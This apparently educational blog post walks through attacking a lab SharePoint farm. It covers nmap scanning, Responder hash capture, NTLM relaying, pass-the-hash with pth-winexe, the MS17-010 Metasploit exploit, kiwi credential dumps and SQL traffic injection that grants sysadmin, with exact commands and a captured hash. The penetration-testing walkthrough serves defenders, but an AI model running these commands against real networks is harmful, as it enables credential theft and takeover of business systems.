A few days ago I had an idea, I wanted to see if I could get into a SharePoint environment without credentials. My idea behind this was to educate the public and help them protect themselves from the vulnerabilities I exploited. Over the course of the next few weeks, I am going to release a number of ways to hack SharePoint and protect SharePoint. Keep your eyes on our blog and be the first in line to get the latest release.

So, how was it done?

I have set up a little network with a DC, SQL and SharePoint 2013/2016/2019 and going to try hack onto the SharePoint servers from a Kali machine on the same network.  The idea behind this to showcase why it so important to harden your SharePoint installation as its one place the entire business keeps all its information, and if that information is removed or breached and sold to competitors, or ransomware how much would that have an effect on the business.

All servers have been installed using default settings, there are a mixture of Windows Server 2012/2016/2019. I have one user pc on Windows 10, again also default settings.

I am also using VirtualBox just cause its FREE and easy to use, and I love that I can copy paste between consoles.


Okay, so let’s pretend my Kali box got access via VPN, wireless or LAN cable and now needs to discover what is going on in this new network.  From DHCP, I can see my IP is 192.168.137.10. So the first thing I am going to do is scan the network and see what I can find.

After a quick Zenmap scan, cause its easier on the eyes and plain old NMAP, I can see a few servers and a few open ports.

The scan I ran was

nmap -p- -T3 -A –Pn 192.168.137.1/24

-p- = Scan all the ports, by default nmap only scans top 1000 and I want to find the port Central Administration is running on and most of the time is randomized

T3 = Speed of which the scan takes place, default is T4 which usually is caught by firewalls so I wanted to slow it down but can still go down to T2 and T1 if needed.

A = Detect OS and Services.

Pn = Forces a connection to the port in case its trying to hide

I have found the following servers

DC = 192.168.137.1

SQL = 192.168.137.2

SharePoint 2019 = 192.168.137.3

SharePoint 2016 = 192.168.137.10

SharePoint 2013 = 192.168.137.14

Netbios and LLMNR Name Poisoning

My first attack is to check to see if I can use responder and dump some hashes.  Responder does exactly that, checks for requests from the network for an SMB resources and then claims to be that resource and grabs the NTLM hash with the pass-through authentication.

Administrator::KRAKEN:8fbf2292b11d4d97:113A2BB25189FBD18BB992CFA56B051D:0101000000000000C0653150DE09D2018C34CD7591E1F511000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000FA2E47326E134461F1AD89675358DFCF9823ED895570905A4B9FEE217C564C8F0A001000000000000000000000000000000000000900160063006900660073002F00310032003300310032003300000000000000000000000000

OK great we got a hash, but this hash is very long it looks a bit strange you might say, and you are correct, infact its a Net-NTLMv2 hash which cannot be used in pass the hash.

  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

We can, however, crack Net-NTLM hashes with Hashcat so we can send that hash over to our Hashcat server and let it run.

Relay attacks

While that Net-NTLM hashcat crack is running we can perform a relay attack.

Fire up Responder again, but this time go to Responder.conf and make sure http and smb are turned off.

Startup Repsonder with this command

python Responder.py -I eth0 -rdw

and in another window fire up NTLMRelayx with this command

python ntlmrelayx.py -tf targets.txt -smbupport

With a little bit of patience and some network activity,  you should be able to dump some SAM files and get those HASHES!

Now that we have a pass the hash scenario we don’t even need to crack the password we can simply pass the hash to login to any server.

pth-winexe -U Kraken/Administrator%aad3b435b51404eeaad3b435b51404ee:76e05d963ccf2270fb610efb8d905ccb //192.168.137.14 cmd.exe

And then I can create a user

And then add that user to the administrator’s group

We could have also used xfreerdp to pth as administrator and logged in, but for some reason I couldn’t get it to work just now so I found an alternative route to keep this blog moving forward.

So now I can jump on the box using any old RDP tool

And because local admins have access to SharePoint Central Administration we are able to get access.

From here I could create a domain user instead of a local user and then pwn all the SharePoint boxes if I needed to but you get the idea.

MS17-010

Eternalblue and other exploits on port 445 are still common believe it or not, especially in older servers like Server 2013/2008/2003

Let’s have a quick check to see if any of the servers on our network are vulnerable.

Nothing at the moment cause they have all been patched, but let me reverse a patch on the 2013 server just to show you how this hack works.  In my local policies I change the following settings.

Then running the check again I can see its now ready for exploitation.

A quick check with zzz_exploit.py script and we can see the target is most certainly vulnerable.

One pwned.txt file found.

So we fire up msfconsole and run ‘use

windows/smb/ms17_010_psexec’

and set the RHOSTS to 192.168.137.14 and run

We now pretty much have pwned that box and can do whatever we like.

Now I load kiwi and run

lsa_dump_secrets

And

lsa_sam_dump

Now I have NTLM hashes to crack, actual passwords to use and of course I can run commands to make myself a user and then again get access like before.

*There are a ton more ways to use Meterpreter, Mimikatz and Kiwi here, the point is not to show all of them but to hack the SharePoint box.  We have successfully done this here so its time to move on.  I have left some links in the references section for you to check out if you want to learn more.

Fix this by checking if you are patched here

https://support.microsoft.com/en-za/help/4023262/how-to-verify-that-ms17-010-is-installed

Sniffing

Firing up bettercap allows me to capture network traffic.

By simply switching on net.sniff on I can capture Net-NTLM handshakes to crack.

But what else can we sniff?  Let’s fire up Wireshark and filter on tds.query

After a watching for a while, I noticed the following string was being processed periodically.

GRANT EXECUTE ON [proc_GetMonitoredScope] TO [KRAKEN\sp2013.service]

If I then used ./SQLInject.sh I could swop out the command and create my own user instead.

./sqlinject.sh -o "GRANT EXECUTE ON [proc_GetCorrelationIdAndUsers] TO [KRAKEN\sp2013.service]" -i "CREATE LOGIN GTconsult WITH PASSWORD='P@ssw0rd'" -s 192.168.137.2 -c 192.168.137.14 -f mssql.filter

./sqlinject.sh -o "GRANT EXECUTE ON [proc_GetCorrelationIdAndUsers] TO [KRAKEN\sp2013.service]" -i "ALTER SERVER ROLE sysadmin ADD MEMBER GTconsult;" -s 192.168.137.2 -c 192.168.137.14 -f mssql.filter

Now I have sysadmin on SQL

*This was only the case due to a poor SharePoint setup and could have been avoided if ‘sysadmin’ was not given to the Farm Account.

We can now download all databases and content and attach them to our farm or we can start playing with MSFconsole and mssql_exec to run commands on the SQL server.

Either way I believe we have sufficiently hacked SharePoint for now.  Stay tuned for the next part of the series where we showcase how to protect from these hacks and Defend your SharePoint server.

References

https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa

https://www.youtube.com/watch?v=sAr4PBR7EUE – Responder Usage

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 – NTLM hashes explaination

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html – Hashes and more explanations

https://www.offensive-security.com/metasploit-unleashed/mimikatz/ – Mimikatz and Meterpreter

https://community.elearnsecurity.com/topic/2945-hacking-microsoft-sql-server-without-a-password/ – SQLInject.sh with Bettercap

https://www.anitian.com/hacking-microsoft-sql-server-without-a-password/ – SQLInject.sh with Bettercap

https://www.offensive-security.com/metasploit-unleashed/payloads-mssql/ – MSF MSSQL hacks

http://www.fuzzysecurity.com/tutorials/16.html – Privilege Escalation